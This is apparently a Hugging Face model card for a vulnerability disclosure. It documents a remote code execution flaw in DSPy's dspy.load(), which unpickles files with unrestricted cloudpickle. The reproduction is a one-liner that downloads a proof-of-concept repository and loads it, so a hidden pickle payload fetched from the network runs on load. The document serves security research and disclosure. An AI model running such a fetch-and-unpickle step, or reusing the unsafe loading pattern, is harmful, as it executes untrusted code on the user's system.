DSPy cloudpickle.load() RCE PoC
Security research PoC for huntr submission.
Vulnerability: dspy.load() in dspy/utils/saving.py:23 loads program.pkl with
cloudpickle.load() (= unrestricted pickle.load). No weights_only, no restrictions.
Any __reduce__-based payload in program.pkl executes at load time.
Affected version: dspy-ai 2.6.27 (latest)
Reproduction
pip install dspy-ai
python3 -c "
import dspy
from huggingface_hub import snapshot_download
path = snapshot_download('th3-j0k3r/dspy-cloudpickle-poc')
dspy.load(path)
print(open('/tmp/dspy_rce_hf.txt').read())
"
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support